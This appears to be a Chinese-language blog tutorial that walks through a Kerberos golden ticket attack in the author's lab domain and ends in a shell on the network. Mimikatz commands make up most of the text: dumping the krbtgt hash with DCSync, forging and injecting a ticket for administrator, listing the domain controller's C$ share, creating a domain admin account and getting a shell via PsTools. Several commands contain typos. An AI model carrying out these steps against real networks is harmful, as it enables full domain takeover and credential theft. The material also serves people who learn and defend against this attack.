黄金票据之拿shell——超详细步骤

黄金票据的意思是，当攻击者能够获取krbtgt的HTLM HASH后，攻击者就可以伪造一张票据授权票，去伪造正域内的任意用户访问到域内kerberos认证的所有服务资源。

域搭建环境：

域名：taozhi.online

域控（server2008）：

域内机器（win7）：

所需条件：

域名称：taozhi.online

域SID:

域控的krntgt账户的hash值

1.在域控机器上，查看域用户net user，确认是否有krbtgt账户。

2.打开mimikatz，执行privilege::debug进行提权。

3. 执行log——lsadump::dcsync /user:krbtgt导出查询信息（此时桌面会生成一个mimikatz的文档，记录里面的sid和Hash NTLM）

sid：S-1-5-21-2977540408-3764402457-1595006286

Hash NTLM：51a7dda975297923b6844020b8b1b5ac

4.在域内的任意一台机器上执行（我这里用的是win7），访问域控，拒绝访问

dir \WIN-AJP4CU7AVGF.taozhi.onlinec$

生成黄金票据并导入到内存

Kerberos::golden /user:administrator /domain:taozhi.online /sid:S-1-5-21-2977540408-3764402457-1595006286 /krbtgt:51a7dda975297923b6844020b8b1b5ac /ptt

打开新的cmd窗口，执行：dir \WIN-AJP4CU7AVGF.taozhi.onlinec$，可直接列出域控目录

黄金票据利用（环境与上面一样，此步骤5接着上面的步骤执行)

清除票据：

klist purge

 5.在域内的任意一台机器上执行（我这里用的是win7），生成黄金票据并导入到内存，此时在mimikatz的文件夹下还会生成一个ticket.kirbi的文件

kerberos::golden /user:administrator /domain:taozhi.online /sid:S-1-5-21-2977540408-3764402457-1595006286 /krbtgt:51a7dda975297923b6844020b8b1b5ac /ticket:ticket.kirbi

通过mimikatz中的kerberos::ptt功能将ticket.kirbi导入内存中。

kerberos::purge

kerberos::ptt tickett.kirbi

此时尝试创建一个xxx的域管账号，命令执行成功：

将pstools放入该台机器的桌面，并解压

成功拿到shell